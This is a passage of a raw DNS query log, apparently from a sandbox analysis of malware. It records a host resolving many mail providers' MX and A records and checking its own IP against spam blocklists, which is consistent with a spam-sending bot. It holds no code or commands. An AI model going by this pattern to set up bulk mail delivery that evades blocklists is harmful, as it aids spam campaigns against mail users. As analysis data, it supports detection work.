Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.636393070 CEST	8.8.8.8	192.168.2.4	0x172c	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:20.708842993 CEST	8.8.8.8	192.168.2.4	0xf518	No error (0)	tlen.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.027929068 CEST	8.8.8.8	192.168.2.4	0xb57d	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.121084929 CEST	8.8.8.8	192.168.2.4	0x5954	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.121084929 CEST	8.8.8.8	192.168.2.4	0x5954	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.121084929 CEST	8.8.8.8	192.168.2.4	0x5954	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.121084929 CEST	8.8.8.8	192.168.2.4	0x5954	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.236207008 CEST	8.8.8.8	192.168.2.4	0xa846	No error (0)	noos.fr			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.292648077 CEST	8.8.8.8	192.168.2.4	0x4349	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.292648077 CEST	8.8.8.8	192.168.2.4	0x4349	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.297235012 CEST	8.8.8.8	192.168.2.4	0x545c	No error (0)	prodigy.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.297235012 CEST	8.8.8.8	192.168.2.4	0x545c	No error (0)	prodigy.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.297235012 CEST	8.8.8.8	192.168.2.4	0x545c	No error (0)	prodigy.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.297235012 CEST	8.8.8.8	192.168.2.4	0x545c	No error (0)	prodigy.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.391005993 CEST	8.8.8.8	192.168.2.4	0x9472	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.405174017 CEST	8.8.8.8	192.168.2.4	0xeadd	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.467696905 CEST	8.8.8.8	192.168.2.4	0x9dbc	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.642010927 CEST	8.8.8.8	192.168.2.4	0xe812	No error (0)	windowslive.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.665138960 CEST	8.8.8.8	192.168.2.4	0x4530	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.745275021 CEST	8.8.8.8	192.168.2.4	0x5f28	No error (0)	nam.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.745275021 CEST	8.8.8.8	192.168.2.4	0x5f28	No error (0)	nam.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.322309017 CEST	8.8.8.8	192.168.2.4	0xbaac	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.345948935 CEST	8.8.8.8	192.168.2.4	0x3db2	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.345948935 CEST	8.8.8.8	192.168.2.4	0x3db2	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.707743883 CEST	8.8.8.8	192.168.2.4	0xe7b5	No error (0)	fourr.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:22.707743883 CEST	8.8.8.8	192.168.2.4	0xe7b5	No error (0)	fourr.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		37.139.4.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		68.183.127.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		143.198.175.12	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		157.230.233.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		37.139.4.118	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		37.139.4.171	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		134.209.79.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.762515068 CEST	8.8.8.8	192.168.2.4	0x50cc	No error (0)	mx37.mb5p.com		37.139.4.163	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.810992956 CEST	8.8.8.8	192.168.2.4	0x65b5	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.810992956 CEST	8.8.8.8	192.168.2.4	0x65b5	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.810992956 CEST	8.8.8.8	192.168.2.4	0x65b5	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.810992956 CEST	8.8.8.8	192.168.2.4	0x65b5	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.814337969 CEST	8.8.8.8	192.168.2.4	0x5c1f	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.995778084 CEST	8.8.8.8	192.168.2.4	0x64b1	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.866353989 CEST	8.8.8.8	192.168.2.4	0x5733	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.869098902 CEST	8.8.8.8	192.168.2.4	0x5e07	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.870718002 CEST	8.8.8.8	192.168.2.4	0x7084	No error (0)	bol.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:23.870718002 CEST	8.8.8.8	192.168.2.4	0x7084	No error (0)	bol.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:23.926294088 CEST	8.8.8.8	192.168.2.4	0x6c17	No error (0)	pro-mail-mx-003.bol.com		185.14.168.3	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.299597025 CEST	8.8.8.8	192.168.2.4	0xb0b6	No error (0)	www.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Sep 5, 2021 15:51:24.299597025 CEST	8.8.8.8	192.168.2.4	0xb0b6	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.20.174	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.725560904 CEST	8.8.8.8	192.168.2.4	0x3044	No error (0)	mx.lb.btinternet.com		213.120.69.89	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.978101969 CEST	8.8.8.8	192.168.2.4	0x5a82	No error (0)	smtp-in.sfr.fr		93.17.128.165	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.978101969 CEST	8.8.8.8	192.168.2.4	0x5a82	No error (0)	smtp-in.sfr.fr		93.17.128.123	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.164915085 CEST	8.8.8.8	192.168.2.4	0x51cd	No error (0)	mx.poczta.onet.pl		213.180.147.146	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.790771008 CEST	8.8.8.8	192.168.2.4	0xb219	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.832030058 CEST	8.8.8.8	192.168.2.4	0x309f	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.889610052 CEST	8.8.8.8	192.168.2.4	0xd8dc	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.945359945 CEST	8.8.8.8	192.168.2.4	0x6d96	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.012003899 CEST	8.8.8.8	192.168.2.4	0x6e28	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.079056978 CEST	8.8.8.8	192.168.2.4	0x3c47	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.080689907 CEST	8.8.8.8	192.168.2.4	0x80de	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.128431082 CEST	8.8.8.8	192.168.2.4	0xf496	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.186964035 CEST	8.8.8.8	192.168.2.4	0x473e	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.237387896 CEST	8.8.8.8	192.168.2.4	0x9b4	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.283068895 CEST	8.8.8.8	192.168.2.4	0x65c5	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.368933916 CEST	8.8.8.8	192.168.2.4	0x2485	No error (0)	vip.qq.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.368933916 CEST	8.8.8.8	192.168.2.4	0x2485	No error (0)	vip.qq.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.368933916 CEST	8.8.8.8	192.168.2.4	0x2485	No error (0)	vip.qq.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.369805098 CEST	8.8.8.8	192.168.2.4	0xe5f3	No error (0)	www.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Sep 5, 2021 15:51:27.369805098 CEST	8.8.8.8	192.168.2.4	0xe5f3	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.17.174	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.717515945 CEST	8.8.8.8	192.168.2.4	0x89f2	No error (0)	mx3.qq.com		203.205.219.57	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956305981 CEST	8.8.8.8	192.168.2.4	0xb946	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.956398010 CEST	8.8.8.8	192.168.2.4	0x7768	No error (0)	myfrontiermail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.956398010 CEST	8.8.8.8	192.168.2.4	0x7768	No error (0)	myfrontiermail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.956398010 CEST	8.8.8.8	192.168.2.4	0x7768	No error (0)	myfrontiermail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.956398010 CEST	8.8.8.8	192.168.2.4	0x7768	No error (0)	myfrontiermail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.956398010 CEST	8.8.8.8	192.168.2.4	0x7768	No error (0)	myfrontiermail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.993107080 CEST	8.8.8.8	192.168.2.4	0xf080	No error (0)	mta7.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.158756971 CEST	8.8.8.8	192.168.2.4	0xed97	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.751508951 CEST	8.8.8.8	192.168.2.4	0x1969	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.757460117 CEST	8.8.8.8	192.168.2.4	0x88a7	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:29.688400984 CEST	8.8.8.8	192.168.2.4	0x8994	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.012068033 CEST	8.8.8.8	192.168.2.4	0xca01	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.714992046 CEST	8.8.8.8	192.168.2.4	0x2f6f	No error (0)	walla.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:30.714992046 CEST	8.8.8.8	192.168.2.4	0x2f6f	No error (0)	walla.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.139.83	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.175	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.158.23	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.150.136	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.120	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.156.153	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.156.179	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.158.12	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.150.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.156.181	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.159.226	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.158.24	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.156.180	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.119	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.118	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		216.71.156.16	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.159.228	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.150.121	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.762581110 CEST	8.8.8.8	192.168.2.4	0xdf62	No error (0)	mx1.hc49497.c3s2.iphmx.com		68.232.156.174	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.866746902 CEST	8.8.8.8	192.168.2.4	0x445a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.866746902 CEST	8.8.8.8	192.168.2.4	0x445a	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.996769905 CEST	8.8.8.8	192.168.2.4	0xe045	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.996769905 CEST	8.8.8.8	192.168.2.4	0xe045	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.130245924 CEST	8.8.8.8	192.168.2.4	0x6b84	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.138205051 CEST	8.8.8.8	192.168.2.4	0x5b59	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.739885092 CEST	8.8.8.8	192.168.2.4	0xbec0	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.749279976 CEST	8.8.8.8	192.168.2.4	0x38f8	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.804986954 CEST	8.8.8.8	192.168.2.4	0x242b	No error (0)	yahoo.co.in			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:31.855855942 CEST	8.8.8.8	192.168.2.4	0xcd01	No error (0)	mx-apac.mail.gm0.yahoodns.net		106.10.248.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.855855942 CEST	8.8.8.8	192.168.2.4	0xcd01	No error (0)	mx-apac.mail.gm0.yahoodns.net		106.10.248.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.246161938 CEST	8.8.8.8	192.168.2.4	0x4b44	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.246161938 CEST	8.8.8.8	192.168.2.4	0x4b44	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.742187023 CEST	8.8.8.8	192.168.2.4	0x56b3	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.168060064 CEST	8.8.8.8	192.168.2.4	0x4452	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.168060064 CEST	8.8.8.8	192.168.2.4	0x4452	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.168060064 CEST	8.8.8.8	192.168.2.4	0x4452	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.168060064 CEST	8.8.8.8	192.168.2.4	0x4452	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.321736097 CEST	8.8.8.8	192.168.2.4	0x8d0e	No error (0)	mx.tlen.pl		193.222.135.150	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.556677103 CEST	8.8.8.8	192.168.2.4	0x92b8	No error (0)	orange.pl			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:33.614278078 CEST	8.8.8.8	192.168.2.4	0x102a	No error (0)	smtp-in.hosting.orange.pl		217.97.216.210	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.833543062 CEST	8.8.8.8	192.168.2.4	0xa210	No error (0)	wp.eu			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:33.872425079 CEST	8.8.8.8	192.168.2.4	0xcf87	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.036710978 CEST	8.8.8.8	192.168.2.4	0x6b6b	No error (0)	mx.wp.pl		212.77.101.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.177252054 CEST	8.8.8.8	192.168.2.4	0x47a	No error (0)	gamil.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:34.232728958 CEST	8.8.8.8	192.168.2.4	0xac2e	No error (0)	mail.gamil.com		192.252.151.212	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.236407995 CEST	8.8.8.8	192.168.2.4	0x91a4	No error (0)	bigpond.com			MX (Mail exchange)	IN (0x0001)
